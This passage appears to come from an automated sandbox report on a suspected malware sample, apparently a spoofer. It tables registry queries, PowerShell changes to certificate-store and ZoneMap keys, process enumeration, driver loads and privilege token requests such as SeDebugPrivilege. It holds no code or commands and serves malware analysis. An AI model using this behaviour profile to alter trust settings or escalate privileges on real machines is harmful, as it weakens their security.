Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ClassGUID C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0065\ C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0064 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066\ C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\ContainerID C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\ConfigFlags C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Device Parameters C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29} C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\LocationInformation C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ClassGUID C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Driver C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29} C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066\ C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ContainerID C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A\ C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0065\ C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066\ C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Capabilities C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29} C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000065\00000000 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\LocationInformation C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Device Parameters C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\LocationInformation C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0064\ C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Device Parameters C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Control C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Device Parameters C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0067\ C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000065\00000000 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0064\ C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29} C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0064\ C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Mfg C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Mfg C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29} C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Device Parameters C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\000C C:\ProgramData\Microsoft\Windows\DevManView.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe N/A
N/A N/A C:\Windows\en-US\conhost.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
